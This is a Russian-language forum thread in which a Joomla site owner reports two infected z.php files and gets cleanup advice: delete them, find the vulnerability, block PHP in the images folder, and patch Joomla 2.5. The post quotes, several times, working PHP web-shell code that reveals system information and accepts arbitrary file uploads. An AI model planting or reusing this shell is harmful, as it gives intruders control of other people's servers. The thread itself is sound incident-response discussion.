Зараженные файлы - Безопасность сайтов на Joomla

Пришло сообщение с хостинга о двух зараженных файлах
mamadom.com.ua/www/images/z.php
mamadom.com.ua/www/z.php
<?php if(isset($_GET["ndmbc"])){echo"[uname]".php_uname()."[/uname]";echo"<form method=post enctype=multipart/form-data>";echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";if($_POST["v"]==up){if(@Copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>berhasil</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";}}}?>
<title>Hacked by d3b~X</title>
<?php if(isset($_GET["ndmbc"])){echo"[uname]".php_uname()."[/uname]";echo"<form method=post enctype=multipart/form-data>";echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";if($_POST["v"]==up){if(@Copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>berhasil</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";}}}?>
<title>Hacked by d3b~X</title>
В файлах хостинг выделил красным зараженные строки.
Файлы удалять полностью или только строчки? Я не помню уже, что это за файлы , и можно ли их удалять.

Эти файлы удаляйте полностью и лечите сайт, ищите причину их возникновения.

Пришло сообщение с хостинга о двух зараженных файлах
mamadom.com.ua/www/images/z.php
mamadom.com.ua/www/z.php
<?php if(isset($_GET["ndmbc"])){echo"[uname]".php_uname()."[/uname]";echo"<form method=post enctype=multipart/form-data>";echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";if($_POST["v"]==up){if(@Copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>berhasil</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";}}}?>
<title>Hacked by d3b~X</title>
<?php if(isset($_GET["ndmbc"])){echo"[uname]".php_uname()."[/uname]";echo"<form method=post enctype=multipart/form-data>";echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";if($_POST["v"]==up){if(@Copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>berhasil</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";}}}?>
<title>Hacked by d3b~X</title>
В файлах хостинг выделил красным зараженные строки.
Файлы удалять полностью или только строчки? Я не помню уже, что это за файлы , и можно ли их удалять.

Код может быть встроен в существующие файлы, так и в виде отдельных. В данном случае полагаю, что это отдельные файлы и их надо полностью удалить и затем озаботиться поиском уязвимости.

я так понимаю, что заражение было в 2014 году?
Дата последней модификации   Источник заражения
/mamadom.com.ua/www/images/z.php   Показать   05.02.2014 13:03:53   
Не определен
/mamadom.com.ua/www/z.php   Показать   05.02.2014 13:03:52   
Не определен

Эти файлы удаляйте полностью и лечите сайт, ищите причину их возникновения.

а сайт не сломается после удаления этих файлов?

В админке другого сайта высветилось такое Joomla!Failed to connect to http://www.rsjoomla.com port 80: Connection refused , до этого, вместо этого сообщения было сообщение об обновлении Joomla. Это может быть как то связано? Хостинг один и тот же.

В папке /images не должно быть файлов .php . Удаляйте все файлы типа z.php

В папке /images не должно быть файлов .php . Удаляйте все файлы типа z.php

Спасибо. Удалил оба файла z.php , сайт работает.

Удалил оба файла z.php , сайт работает.

только еще раз обратите внимание, что это не решило проблему на будущее. вы удалили результат заражения, но причина осталась. теперь ее надо найти и устранить.

я так понимаю, что заражение было в 2014 году?
Дата последней модификации   Источник заражения
/mamadom.com.ua/www/images/z.php   Показать   05.02.2014 13:03:53   
Не определен
/mamadom.com.ua/www/z.php   Показать   05.02.2014 13:03:52   
Не определен

Обычно вирусы дату изменения специально выставляют не актуальную.

Автору рекомендую добавить в конфиг Nginx, чтобы запретить выполнение PHP скриптов:

   

рекомендую добавить в конфиг Nginx

Шаред наверняка.

А какая версия Joomla? Сколько сайтов на аккаунте хостинга?

Шаред наверняка.

А какая версия Joomla? Сколько сайтов на аккаунте хостинга?

У нормального шареда такой конфиг уже должен быть по умолчанию.

конфиг Nginx

а где это находится?

ТС, вам проще в комм раздел обратиться.
Ну вычистили 2, а остальные 100?
А дырки закрыть?

Шаред наверняка.

А какая версия Joomla? Сколько сайтов на аккаунте хостинга?

Joomla 2.5. у меня 4  сайта на хостинге.

Joomla 2.5

2.5 сколько? Там минимум еще 2 патча должны быть. 100% сайты не изолированы от друг друга и все расползлось уже.

на виртуальном хостинге в папку с картинками ложим файл .htaccess
Но если во вложенных папках будет чужой .htaccess, этот не будет работать.

2.5 сколько? Там минимум еще 2 патча должны быть. 100% сайты не изолированы от друг друга и все расползлось уже.

на 2.5 только один этот сайт.Другие на 3. и на друпале

на 2.5 только один этот сайт.Другие на 3. и на друпале

а это уже все равно скорее всего...

на 2.5 только один этот сайт.

Ну тогда советую его отделить от других пока все лечить не пришлось. Ну и минимум обновить его до 2.5.28 и поставить патч на сессии https://github.com/joomla/joomla-cms/releases/download/3.4.7/SessionHardening25v1.zip и лечить или мигрировать. С 2 патчами я ошибся кажется. Это для 1.5.26 2 надо. Хотя уже может поздно.

Ну тогда советую его отделить от других пока все лечить не пришлось. Ну и минимум обновить его до 2.5.28 и поставить патч на сессии https://github.com/joomla/joomla-cms/releases/download/3.4.7/SessionHardening25v1.zip и лечить или мигрировать. С 2 патчами я ошибся кажется. Это для Joomla 1.5.26 2 надо. Хотя уже может поздно.

если сайт обновить выше 2.5, то он перестаёт работать.там какие то модули, или плагины заточены только под 2.5

так патч не повысит версию до 3-й, он просто закроет уязвимость

если сайт обновить выше 2.5, то он перестаёт работать.там какие то модули, или плагины заточены только под 2.5

А кто сказал обновлять выше?
2.5.28 +патчи.
Но 99% что уже поздно

Но 99% что уже поздно

ну там же на самом деле еще версия php важна. так что может там даже не в этом дело...

ну там же на самом деле еще версия php важна. так что может там даже не в этом дело...

Так залито же пару шеллов.
Ограничились парой? Такое не встречается

не, я имею в виду, что причина может быть не в отсутствии патчей. может быть шаблон, какое то расширение, и т.п.

не, я имею в виду, что причина может быть не в отсутствии патчей. может быть шаблон, какое то расширение, и т.п.

Это конечно, запросто

ну там же на самом деле еще версия php важна. так что может там даже не в этом дело...

Версия PHP: 7.0.24

быть того не может. Joomla 2.5 на 7-ке не работает